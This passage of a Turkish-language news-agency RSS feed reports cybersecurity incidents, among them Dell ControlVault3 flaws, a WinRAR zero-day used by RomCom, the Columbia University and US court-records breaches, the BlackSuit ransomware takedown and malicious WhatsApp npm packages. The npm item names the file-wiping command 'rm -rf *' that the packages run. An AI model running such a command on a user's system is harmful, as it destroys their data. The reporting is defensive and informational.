<p data-start="1007" data-end="1231"><strong data-start="1007" data-end="1042">25 bini aşkın müşteri etkilendi</strong><br data-start="1042" data-end="1045">Olaydan 25 bin 737 müşteri ve potansiyel müşterinin etkilendiği bildirildi. Ele geçirilen veriler arasında isim, e-posta adresi, ülke bilgisi, müşteri kimliği ve doğum tarihi yer aldı.</p>
<p data-start="1233" data-end="1472"><strong data-start="1233" data-end="1271">KVKK kamuoyuna duyurma kararı aldı</strong><br data-start="1271" data-end="1274">Kişisel Verileri Koruma Kurulu, 3 Haziran 2025 tarihli ve 2025/1006 sayılı kararıyla veri ihlalinin kurumun internet sitesinde ilan edilmesine karar verdi. Konuya ilişkin incelemeler devam ediyor.</p>
<p data-start="1474" data-end="1636"><strong data-start="1474" data-end="1486"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Dell dizüstülerde “ReVault” açığı: Windows oturum açma bypass edilerek kalıcı zararlı yazılım yüklenebiliyor</title>
<link>https://www.ajansexpres.com.tr/dell-dizustulerde-revault-acigi-windows-oturum-acma-bypass-edilerek-kalici-zararli-yazilim-yuklenebiliyor</link>
<guid>https://www.ajansexpres.com.tr/dell-dizustulerde-revault-acigi-windows-oturum-acma-bypass-edilerek-kalici-zararli-yazilim-yuklenebiliyor</guid>
<description><![CDATA[ Cisco Talos araştırmacıları, Dell’in Latitude ve Precision serisi dahil 100’den fazla modelinde kullanılan ControlVault3 güvenlik yongasında kritik açıklar tespit etti. “ReVault” adı verilen beş zafiyet, saldırganlara Windows oturum açmayı atlama, yönetici ayrıcalığı elde etme ve işletim sistemi yeniden kurulduktan sonra dahi varlığını sürdüren kötü amaçlı yazılım yerleştirme imkânı veriyor. Dell, Mart-Mayıs 2025 döneminde güvenlik güncellemeleri yayımladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd28f28df.webp" length="43794" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:04 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ReVault açıkları hangi Dell modellerini etkiliyor, saldırganlar Windows oturumunu nasıl bypass edebiliyor, hangi güvenlik önlemleri alınmalı, Dell bu zafiyetlere karşı ne zaman güncelleme yayımladı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="630" data-end="982"><strong data-start="630" data-end="666">Beş güvenlik açığı tespit edildi</strong><br data-start="666" data-end="669">Cisco’nun Talos güvenlik ekibi, Dell’in ControlVault3 firmware ve Windows API’lerinde beş kritik açık keşfetti. CVE-2025-24311, CVE-2025-25050, CVE-2025-25215, CVE-2025-24922 ve CVE-2025-24919 kodlarıyla tanımlanan açıklar bellek taşmalarından güvensiz serileştirmeye kadar farklı güvenlik kusurlarını içeriyor.</p>
<p data-start="984" data-end="1292"><strong data-start="984" data-end="1015">Oturum açma atlatılabiliyor</strong><br data-start="1015" data-end="1018">Araştırmaya göre saldırganlar bu açıkları zincirleyerek firmware üzerinde keyfi kod çalıştırabiliyor. Bu sayede Windows oturum açma işlemini atlatmak, kullanıcı ayrıcalıklarını yönetici seviyesine çıkarmak ve kalıcı kötü amaçlı yazılımlar yerleştirmek mümkün hale geliyor.</p>
<p data-start="1294" data-end="1585"><strong data-start="1294" data-end="1319">Fiziksel erişim riski</strong><br data-start="1319" data-end="1322">Cisco Talos, fiziksel erişimi bulunan bir saldırganın cihazı açarak USB üzerinden Unified Security Hub (USH) kartına bağlanabileceğini, böylece parmak izi doğrulamasını manipüle ederek cihazın herhangi bir parmak izini kabul etmesini sağlayabileceğini bildirdi.</p>
<p data-start="1587" data-end="1784"><strong data-start="1587" data-end="1616">Dell güncelleme yayımladı</strong><br data-start="1616" data-end="1619">Dell, Mart-Mayıs 2025 arasında ControlVault3 sürücü ve firmware güncellemeleri yayımladı. Şirket, etkilenen modellerin tam listesini güvenlik duyurusunda paylaştı.</p>
<p data-start="1786" data-end="2195"><strong data-start="1786" data-end="1807">Önerilen önlemler</strong><br data-start="1807" data-end="1810">Araştırmacılar, cihazların güncel tutulması, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik bileşenlerinin devre dışı bırakılması gerektiğini vurguladı. Ayrıca BIOS üzerinden kasa açılma uyarısının etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği (ESS) özelliğinin kullanılmasının fiziksel saldırılara karşı ek koruma sağlayacağı belirtildi.</p>
<p data-start="2197" data-end="2413"><strong data-start="2197" data-end="2209"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>WinRAR’da sıfır gün açığı: RomCom grubu sahte e&#45;postalarla zararlı yazılım yükledi</title>
<link>https://www.ajansexpres.com.tr/winrarda-sifir-gun-acigi-romcom-grubu-sahte-e-postalarla-zararli-yazilim-yukledi</link>
<guid>https://www.ajansexpres.com.tr/winrarda-sifir-gun-acigi-romcom-grubu-sahte-e-postalarla-zararli-yazilim-yukledi</guid>
<description><![CDATA[ CVE-2025-8088 olarak takip edilen ve WinRAR 7.13 sürümüyle giderilen güvenlik açığı, saldırganların özel hazırlanmış arşivlerle dosyaları kullanıcı seçimi dışında dizinlere çıkarmasına imkân tanıyor. Açığın sıfır gün olarak kullanıldığı saldırılarda RomCom grubu, kimlik avı e-postalarıyla dağıttığı RAR dosyaları üzerinden sistemlere arka kapı yerleştirdi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd2475c2c.webp" length="39472" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:27:00 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>WinRAR CVE-2025-8088 açığı nasıl çalışıyor, RomCom grubu bu açığı hangi yöntemle kullandı, saldırılardan kimler etkilendi, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="500" data-end="788"><strong data-start="500" data-end="536">Dizin geçişi açığı tespit edildi</strong><br data-start="536" data-end="539">ESET araştırmacıları Anton Cherepanov, Peter Košinár ve Peter Strýček tarafından keşfedilen CVE-2025-8088 açığı, WinRAR’ın önceki sürümlerinde dosya çıkartma sırasında saldırgan tarafından belirlenen bir yola yönlendirme yapılmasına imkân veriyor.</p>
<p data-start="790" data-end="1038"><strong data-start="790" data-end="839">Windows başlangıç klasörüne kötü amaçlı dosya</strong><br data-start="839" data-end="842">Bu yöntemle saldırganlar, zararlı yürütülebilir dosyaları Windows Başlangıç klasörlerine yerleştirebiliyor. Kullanıcı oturum açtığında dosya otomatik çalışıyor ve uzaktan kod yürütme sağlanıyor.</p>
<p data-start="1040" data-end="1272"><strong data-start="1040" data-end="1079">Phishing kampanyalarında kullanıldı</strong><br data-start="1079" data-end="1082">ESET, RomCom grubunun hedefli kimlik avı e-postaları aracılığıyla gönderilen RAR eklerinde bu açığı kullandığını belirledi. Bu saldırılarla kurban sistemlere RomCom arka kapıları yüklendi.</p>
<p data-start="1274" data-end="1587"><strong data-start="1274" data-end="1307">RomCom’un geçmiş faaliyetleri</strong><br data-start="1307" data-end="1310">Rusya bağlantılı RomCom grubu (Storm-0978, Tropical Scorpius veya UNC2596 olarak da biliniyor), daha önce Cuba ve Industrial Spy fidye yazılımlarıyla ilişkilendirilmişti. Grup, kimlik bilgisi hırsızlığı ve veri gaspı odaklı saldırılarda sıfır gün açıklarını sıkça kullanıyor.</p>
<p data-start="1589" data-end="1784"><strong data-start="1589" data-end="1625">Kullanıcılara güncelleme uyarısı</strong><br data-start="1625" data-end="1628">Uzmanlar, WinRAR’ın otomatik güncelleme özelliği bulunmadığı için tüm kullanıcıların 7.13 sürümünü manuel olarak indirip yüklemesi gerektiğini vurguluyor.</p>
<p data-start="1786" data-end="1970"><strong data-start="1786" data-end="1798"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD’de 60 yaş üstü kişiler 2024’te dolandırıcılara 700 milyon dolar kaybetti</title>
<link>https://www.ajansexpres.com.tr/abdde-60-yas-ustu-kisiler-2024te-dolandiricilara-700-milyon-dolar-kaybetti</link>
<guid>https://www.ajansexpres.com.tr/abdde-60-yas-ustu-kisiler-2024te-dolandiricilara-700-milyon-dolar-kaybetti</guid>
<description><![CDATA[ ABD Federal Ticaret Komisyonu’nun (FTC) yayımladığı rapora göre, 2024 yılında 60 yaş üstü Amerikalılar çevrim içi dolandırıcılıklarda 700 milyon dolar kaybetti. Bu rakam, 2020 yılına kıyasla altı kat artışa, 2023’e kıyasla ise yüzde 30 yükselişe işaret ediyor. FTC, en yaygın yöntemlerin sahte resmi kurum kimlikleri, acil durum senaryoları ve telefon dolandırıcılığı olduğunu açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd20613aa.webp" length="46692" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:56 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ABD’de 60 yaş üstü kişiler 2024’te dolandırıcılara ne kadar para kaybetti, en yaygın dolandırıcılık yöntemleri neler, kayıplar önceki yıllara göre nasıl değişti, yaşlılar neden hedef alınıyor</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="523" data-end="818"><strong data-start="523" data-end="555">Kayıplar 2024’te rekor kırdı</strong><br data-start="555" data-end="558">FTC’nin Tüketici Koruma Veri Raporu’na göre 2024 yılında 60 yaş üstü bireyler toplamda 700 milyon dolarını dolandırıcılara kaptırdı. Bu miktar, 2020’deki 121 milyon dolarlık kaybın altı katına, 2023’teki 542 milyon dolarlık kaybın ise yüzde 30 üzerine çıktı.</p>
<p data-start="820" data-end="1099"><strong data-start="820" data-end="860">En büyük kayıp 100 bin dolar üstünde</strong><br data-start="860" data-end="863">Rapor, 2024’te 100 bin doların üzerinde kayıp yaşayanların toplam 445 milyon dolar kaybettiğini ortaya koydu. 10 ila 100 bin dolar arası kayıplar 214 milyon dolar, 10 bin dolar altındaki kayıplar ise 41 milyon dolar olarak kaydedildi.</p>
<p data-start="1101" data-end="1436"><strong data-start="1101" data-end="1149">Dolandırıcıların en sık kullandığı yöntemler</strong><br data-start="1149" data-end="1152">Dolandırıcılık yöntemleri arasında resmi kurum ya da şirket kılığına girme, sahte kriz senaryoları ve telefonla baskı en öne çıkanlar oldu. Dolandırıcılar, bankalarda şüpheli işlem, sosyal güvenlik numarasıyla işlenen suç veya bilgisayar korsanlığı iddialarıyla mağdurları kandırdı.</p>
<p data-start="1438" data-end="1730"><strong data-start="1438" data-end="1474">FTC adına sahte aramalar yapıldı</strong><br data-start="1474" data-end="1477">FTC’nin açıklamasına göre bazı dolandırıcılar, ironiyle kurumun adını kullanarak sahte personel kimliğiyle insanları kandırdı. Mağdurlara, paralarını Bitcoin ATM’lerine yatırmaları, nakit veya altın teslim etmeleri gibi asılsız yönlendirmeler yapıldı.</p>
<p data-start="1732" data-end="2013"><strong data-start="1732" data-end="1765">Yaşlılar neden hedef alınıyor</strong><br data-start="1765" data-end="1768">Rapora göre yaşlı yetişkinler, daha büyük finansal birikimlere sahip olmaları, otoritelere duydukları güven ve teknolojiyi daha az bilme sebebiyle hedef oluyor. Birçok kişinin hayat birikimlerini ve emeklilik hesaplarını kaybettiği bildirildi.</p>
<p data-start="2015" data-end="2225"><strong data-start="2015" data-end="2063">Genel dolandırıcılık kaybı 12,5 milyar dolar</strong><br data-start="2063" data-end="2066">FTC, 2024 yılında Amerikalıların toplam dolandırıcılık kaybının 12,5 milyar dolara ulaştığını ve bunun 2023’e göre yüzde 25 artış anlamına geldiğini duyurdu.</p>
<p data-start="2227" data-end="2437"><strong data-start="2227" data-end="2239"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD Federal Yargısı, elektronik dava kayıt sistemine siber saldırıyı doğruladı</title>
<link>https://www.ajansexpres.com.tr/abd-federal-yargisi-elektronik-dava-kayit-sistemine-siber-saldiriyi-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/abd-federal-yargisi-elektronik-dava-kayit-sistemine-siber-saldiriyi-dogruladi</guid>
<description><![CDATA[ ABD Federal Yargısı, mahkeme belgelerinin tutulduğu elektronik kayıt sisteminin sofistike siber saldırılarla hedef alındığını açıkladı. Çoğu belgenin kamuya açık olduğu belirtilse de gizli dosyaların korunması için erişim kısıtlamaları artırıldı. Politico’nun haberine göre ihlal, bazı gizli tanıkların kimliklerini açığa çıkarmış olabilir. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd1c0d07e.webp" length="46662" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:51 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ABD Federal Yargısı’nın elektronik dava kayıt sisteminde hangi veriler risk altında, saldırı ne zaman fark edildi, Politico hangi iddiaları gündeme getirdi, kurum hangi önlemleri açıkladı</media:keywords>
<content:encoded><![CDATA[<p data-start="479" data-end="743">ABD Federal Yargısı, elektronik dava yönetim sistemi CM/ECF ve PACER’in gelişmiş ve ısrarcı saldırılarla hedef alındığını doğruladı. Açıklamada, özellikle gizli belgelerin artık daha sıkı erişim kontrolleriyle korunduğu bildirildi.</p>
<p data-start="745" data-end="1130"><strong data-start="745" data-end="794">Politico’nun iddiaları sonrası açıklama geldi</strong><br data-start="794" data-end="797">Politico’nun hafta başında yayımladığı haberde, saldırının bazı federal bölgelerde gizli bilgileri ortaya çıkardığı, hatta gizli tanıkların kimliklerini açığa çıkarmış olabileceği öne sürülmüştü. Kurumun yaptığı açıklama bu iddiaları doğrudan teyit etmese de, davacıları etkileyecek verilerin zarar görmüş olabileceğini ima ediyor.</p>
<p data-start="1132" data-end="1380"><strong data-start="1132" data-end="1159">4 Temmuz’da fark edildi</strong><br data-start="1159" data-end="1162">İsimsiz kaynaklara göre, saldırının boyutu 4 Temmuz 2025’te tam olarak anlaşıldı ve ardından kurum içinde gizli bir bilgilendirme yapıldı. Ancak kamuoyuna ilk resmi açıklama ancak Politico’nun haberinden sonra geldi.</p>
<p data-start="1382" data-end="1637"><strong data-start="1382" data-end="1416">Güvenlik önlemleri artırılıyor</strong><br data-start="1416" data-end="1419">Yargı yetkilileri, sistemin güvenliğinin artırıldığını, saldırıları engellemek için yeni önlemler alındığını ve mahkemelerle iş birliği yapılarak davacılar üzerindeki etkinin en aza indirilmeye çalışıldığını duyurdu.</p>
<p data-start="1639" data-end="1862"><strong data-start="1639" data-end="1677">Kamu ve özel sektörde artan tehdit</strong><br data-start="1677" data-end="1680">Federal Yargı, hem kamu hem de özel kurumlara yönelik siber saldırıların artan hacim ve karmaşıklığına dikkat çekerek, eski sistemlerin korunmasının giderek zorlaştığını vurguladı.</p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft 365 uygulamaları eski FPRPC protokolüyle dosya erişimini varsayılan olarak engelleyecek</title>
<link>https://www.ajansexpres.com.tr/microsoft-365-uygulamalari-eski-fprpc-protokoluyle-dosya-erisimini-varsayilan-olarak-engelleyecek</link>
<guid>https://www.ajansexpres.com.tr/microsoft-365-uygulamalari-eski-fprpc-protokoluyle-dosya-erisimini-varsayilan-olarak-engelleyecek</guid>
<description><![CDATA[ Microsoft, Windows için Microsoft 365 uygulamalarının Ağustos 2025’ten itibaren eski ve güvensiz FPRPC (FrontPage Remote Procedure Call) protokolüyle dosya açmayı varsayılan olarak engelleyeceğini duyurdu. Değişiklik, kullanıcıları eski kimlik doğrulama yöntemlerine yönelik saldırılardan korumayı amaçlıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd16beb4e.webp" length="31612" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:46 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Microsoft 365 uygulamalarında FPRPC protokolü neden engelleniyor, değişiklik ne zaman yürürlüğe girecek, yöneticiler protokol ayarlarını nasıl kontrol edecek, Microsoft son dönemde hangi güvenlik adımlarını attı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="466" data-end="724"><strong data-start="466" data-end="498">FPRPC devre dışı bırakılıyor</strong><br data-start="498" data-end="501">Microsoft, 365 uygulamalarının 2508 sürümüyle birlikte FPRPC üzerinden dosya erişiminin varsayılan olarak engelleneceğini açıkladı. Engelleme Ağustos sonunda başlayacak, tüm kullanıcılara Eylül 2025 sonuna kadar ulaşacak.</p>
<p data-start="726" data-end="1021"><strong data-start="726" data-end="759">FTP ve HTTP için yeni ayarlar</strong><br data-start="759" data-end="762">Yeni Trust Center ayarlarıyla kullanıcılar, yöneticiler izin verdiği sürece FPRPC’yi yeniden etkinleştirebilecek. Ayrıca FTP ve HTTP üzerinden dosya açma işlemleri hâlen varsayılan olarak açık olsa da, kullanıcıların bu protokolleri kapatma seçeneği olacak.</p>
<p data-start="1023" data-end="1285"><strong data-start="1023" data-end="1056">Yöneticiler için CPS kontrolü</strong><br data-start="1056" data-end="1059">Yöneticiler, Cloud Policy Service (CPS) üzerinden kimlik doğrulama protokollerini yönetebilecek. Eğer bir protokol CPS üzerinden devre dışı bırakılırsa, kullanıcılar Trust Center ayarlarıyla yeniden aktif hale getiremeyecek.</p>
<p data-start="1287" data-end="1688"><strong data-start="1287" data-end="1331">Microsoft güvenlik önlemlerini artırıyor</strong><br data-start="1331" data-end="1334">Şirket, son dönemde güvenlik açıklarını azaltmak için art arda önlemler aldı. Ocak 2025’ten itibaren ActiveX kontrolleri Microsoft 365 ve Office 2024’te devre dışı bırakıldı. Temmuz ayında Teams toplantılarında ekran görüntüsü engelleme özelliği devreye alındı. Outlook’ta ise .library-ms ve .search-ms dosya türleri engellenen ekler listesine eklendi.</p>
<p data-start="1690" data-end="1920"><strong data-start="1690" data-end="1702"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Columbia Üniversitesi veri ihlali: 870 bin öğrenci ve çalışan kişisel, finansal ve sağlık verilerini kaybetti</title>
<link>https://www.ajansexpres.com.tr/columbia-universitesi-veri-ihlali-870-bin-oegrenci-ve-calisan-kisisel-finansal-ve-saglik-verilerini-kaybetti</link>
<guid>https://www.ajansexpres.com.tr/columbia-universitesi-veri-ihlali-870-bin-oegrenci-ve-calisan-kisisel-finansal-ve-saglik-verilerini-kaybetti</guid>
<description><![CDATA[ ABD’deki Columbia Üniversitesi, Mayıs 2025’te yaşanan siber saldırıda 868 bin 969 kişinin kişisel, finansal ve sağlık bilgilerinin çalındığını açıkladı. Çalınan veriler arasında doğum tarihi, Sosyal Güvenlik numarası, akademik geçmiş ve sigorta bilgileri bulunuyor. Üniversite, etkilenenlere iki yıl ücretsiz kimlik koruma hizmeti sunacak. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd12463b2.webp" length="56772" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:42 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Columbia Üniversitesi veri ihlalinde kaç kişi etkilendi, hangi kişisel bilgiler sızdırıldı, saldırı nasıl fark edildi, mağdurlara hangi destekler sunulacak</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="509" data-end="798"><strong data-start="509" data-end="541">Saldırı Mayıs’ta gerçekleşti</strong><br data-start="541" data-end="544">Columbia Üniversitesi, 16 Mayıs 2025 civarında yetkisiz erişim yoluyla ağ sistemlerine girildiğini ve belirli dosyaların dışarıya çıkarıldığını duyurdu. Olay, 24 Haziran’da sistemlerde yaşanan kesinti sonrası başlatılan inceleme sırasında ortaya çıktı.</p>
<p data-start="800" data-end="1055"><strong data-start="800" data-end="833">870 bine yakın kişi etkilendi</strong><br data-start="833" data-end="836">Üniversitenin Maine Başsavcılığı’na sunduğu belgelerde, 868 bin 969 kişinin ihlalden etkilendiği belirtildi. Bu kişiler arasında mevcut ve eski öğrenciler, başvuru sahipleri, çalışanlar ve bazı aile üyeleri bulunuyor.</p>
<p data-start="1057" data-end="1417"><strong data-start="1057" data-end="1092">Çalınan verilerin kapsamı geniş</strong><br data-start="1092" data-end="1095">Bildirim mektuplarına göre, etkilenen veriler arasında ad, doğum tarihi, Sosyal Güvenlik numarası, iletişim bilgileri, demografik veriler, akademik kayıtlar, mali yardım bilgileri ve sağlık ile sigorta verileri yer alıyor. Üniversite, Columbia University Irving Medical Center hasta kayıtlarının etkilenmediğini duyurdu.</p>
<p data-start="1419" data-end="1741"><strong data-start="1419" data-end="1453">Ücretsiz kimlik koruma desteği</strong><br data-start="1453" data-end="1456">Columbia Üniversitesi, çalınan verilerin henüz dolandırıcılıkta kullanılmadığına dair bir bulgu olmadığını açıklasa da, mağdurlara iki yıl boyunca Kroll üzerinden ücretsiz kredi izleme, dolandırıcılık danışmanlığı ve kimlik hırsızlığına karşı destek hizmetleri sunulacağını bildirdi.</p>
<p data-start="1743" data-end="1932"><strong data-start="1743" data-end="1786">Hacker 460 GB veri çaldığını iddia etti</strong><br data-start="1786" data-end="1789">Üniversite, geçtiğimiz hafta yaptığı ilk açıklamada, saldırganın yaklaşık 460 gigabayt veriyi ele geçirdiği yönündeki iddiaları doğrulamıştı.</p>
<p data-start="1934" data-end="2108"><strong data-start="1934" data-end="1946"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Royal ve BlackSuit fidye yazılım grupları 450’den fazla ABD şirketini hedef aldı, 370 milyon dolar fidye topladı</title>
<link>https://www.ajansexpres.com.tr/royal-ve-blacksuit-fidye-yazilim-gruplari-450den-fazla-abd-sirketini-hedef-aldi-370-milyon-dolar-fidye-topladi</link>
<guid>https://www.ajansexpres.com.tr/royal-ve-blacksuit-fidye-yazilim-gruplari-450den-fazla-abd-sirketini-hedef-aldi-370-milyon-dolar-fidye-topladi</guid>
<description><![CDATA[ ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit fidye yazılım çetelerinin 2022’den bu yana sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla kuruluşa saldırdığını açıkladı. Çetelerin çifte şantaj yöntemleriyle 370 milyon dolardan fazla fidye geliri elde ettiği, geçen ay gerçekleştirilen uluslararası “Operation Checkmate” operasyonuyla altyapılarının çökertildiği bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd0dbc852.webp" length="40438" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:37 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Royal ve BlackSuit fidye yazılım grupları hangi sektörleri hedef aldı, toplam ne kadar fidye geliri elde edildi, gruplar nasıl çökertildi, Chaos ransomware BlackSuit’in devamı mı</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="576" data-end="854"><strong data-start="576" data-end="609">Çete 2022’den bu yana aktifti</strong><br data-start="609" data-end="612">ABD İç Güvenlik Soruşturmaları (HSI), Royal ve BlackSuit olarak bilinen siber suç grubunun altyapısının uluslararası iş birliğiyle geçen ay çökertildiğini duyurdu. Grubun 2022’den bu yana 450’den fazla ABD şirketini hedef aldığı belirlendi.</p>
<p data-start="856" data-end="1128"><strong data-start="856" data-end="901">Çifte şantaj yöntemiyle milyonlarca dolar</strong><br data-start="901" data-end="904">Açıklamaya göre saldırganlar, sistemleri şifreleyerek kullanılamaz hale getiriyor, ardından çalınan verileri sızdırma tehdidiyle ödeme talep ediyordu. Bu yöntemle elde edilen fidye miktarı 370 milyon doların üzerine çıktı.</p>
<p data-start="1130" data-end="1414"><strong data-start="1130" data-end="1171">Conti’den Royal’a, oradan BlackSuit’a</strong><br data-start="1171" data-end="1174">Grup ilk kez 2022 başında Quantum fidye yazılımıyla ortaya çıktı ve Conti çetesinin halefi olarak değerlendirildi. Aynı yıl Royal markasıyla yeniden ortaya çıkan grup, 2023’te Dallas şehrini hedef aldıktan sonra BlackSuit adını benimsedi.</p>
<p data-start="1416" data-end="1690"><strong data-start="1416" data-end="1455">Uluslararası operasyonla çökertildi</strong><br data-start="1455" data-end="1458">ABD Adalet Bakanlığı, 24 Temmuz 2025’te yaptığı açıklamada BlackSuit’in karanlık ağ sitelerinin ele geçirildiğini ve yerine “seizure banner” uyarılarının yerleştirildiğini duyurdu. Operasyonun kod adı “Checkmate” olarak açıklandı.</p>
<p data-start="1692" data-end="2017"><strong data-start="1692" data-end="1729">Yeni kimlikle geri dönüş ihtimali</strong><br data-start="1729" data-end="1732">Cisco Talos araştırmacıları, BlackSuit’in yeniden yapılanarak Chaos adıyla faaliyet göstermeye başladığına dair bulgular tespit etti. Yeni yapı, fidye yazılım hizmeti (RaaS) modeliyle çalışıyor ve hem yerel hem uzak depolamayı hedef alan saldırılarda çifte şantaj yöntemi kullanıyor.</p>
<p data-start="2019" data-end="2216"><strong data-start="2019" data-end="2031"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Sahte WhatsApp kütüphaneleri geliştirici bilgisayarlarını siliyor, Go ekosistemi de hedefte</title>
<link>https://www.ajansexpres.com.tr/sahte-whatsapp-kutuphaneleri-gelistirici-bilgisayarlarini-siliyor-go-ekosistemi-de-hedefte</link>
<guid>https://www.ajansexpres.com.tr/sahte-whatsapp-kutuphaneleri-gelistirici-bilgisayarlarini-siliyor-go-ekosistemi-de-hedefte</guid>
<description><![CDATA[ NPM’de WhatsApp geliştirici araçları gibi görünen iki zararlı paket, kurbanların bilgisayarındaki dosyaları topluca silen yıkıcı kod içeriyor. Araştırmacılar, bu sahte kütüphanelerin 1.100’den fazla kez indirildiğini belirledi. Aynı yayıncıya ait başka paketler de risk altında olabilir. Go ekosisteminde de 11 zararlı paket tespit edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd0910597.webp" length="59746" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:26:32 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Sahte WhatsApp kütüphaneleri nasıl çalışıyor, bu paketlerden kaç geliştirici etkilendi, hangi veriler risk altında, Go ekosisteminde hangi zararlı paketler keşfedildi</media:keywords>
<content:encoded><![CDATA[<p></p>
<p data-start="491" data-end="772"><strong data-start="491" data-end="530">NPM’de sahte WhatsApp kütüphaneleri</strong><br data-start="530" data-end="533">Siber güvenlik şirketi Socket, NPM platformunda WhatsApp geliştirme araçları kılığına giren iki zararlı paketi tespit etti. “naya-flore” ve “nvlore-hsc” isimli paketler, WhatsApp botları ve otomasyon araçları geliştirenleri hedef alıyor.</p>
<p data-start="774" data-end="1142"><strong data-start="774" data-end="809">Dosya silme komutu çalıştırıyor</strong><br data-start="809" data-end="812">Her iki pakette de “requestPairingCode” adlı fonksiyon, WhatsApp eşleştirme işlemi gibi görünse de aslında bir GitHub adresinden gelen verileri işliyor. Belirli telefon numaralarına sahip kullanıcılar hariç, hedef alınan geliştiricilerin sisteminde “rm -rf *” komutu çalıştırılıyor ve bulunduğu dizindeki tüm dosyalar siliniyor.</p>
<p data-start="1144" data-end="1444"><strong data-start="1144" data-end="1179">Veri sızdırma fonksiyonu da var</strong><br data-start="1179" data-end="1182">Paketlerde ayrıca “generateCreeds” adlı, telefon numarası, cihaz kimliği ve anahtar bilgilerini çalabilecek bir fonksiyonun da bulunduğu tespit edildi. Bu fonksiyon şu an yorum satırına alınmış durumda ancak ileride aktif hale getirilebileceği uyarısı yapıldı.</p>
<p data-start="1446" data-end="1762"><strong data-start="1446" data-end="1484">Go geliştiricileri de risk altında</strong><br data-start="1484" data-end="1487">Socket, aynı zamanda Go ekosisteminde 11 zararlı paket keşfetti. Bu paketler, sahte isimlerle yüklenip çalıştırıldığında uzaktan yüklenen zararlı komut dosyalarını çalıştırıyor. Çoğu, yazım hatalarına dayalı “typosquatting” yöntemiyle geliştiricileri yanıltmayı hedefliyor.</p>
<p data-start="1764" data-end="1963"><strong data-start="1764" data-end="1789">Geliştiricilere uyarı</strong><br data-start="1789" data-end="1792">Araştırmacılar, hem NPM hem de Go geliştiricilerinin kullandıkları kütüphaneleri dikkatle doğrulamaları gerektiğini vurguladı. Birçok paket hâlâ aktif durumda bulunuyor.</p>
<p data-start="1965" data-end="2150"><strong data-start="1965" data-end="1977"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>CISA, federal kurumlara yeni Microsoft Exchange açığını Pazartesi’ye kadar kapatma talimatı verdi</title>
<link>https://www.ajansexpres.com.tr/cisa-federal-kurumlara-yeni-microsoft-exchange-acigini-pazartesiye-kadar-kapatma-talimati-verdi</link>
<guid>https://www.ajansexpres.com.tr/cisa-federal-kurumlara-yeni-microsoft-exchange-acigini-pazartesiye-kadar-kapatma-talimati-verdi</guid>
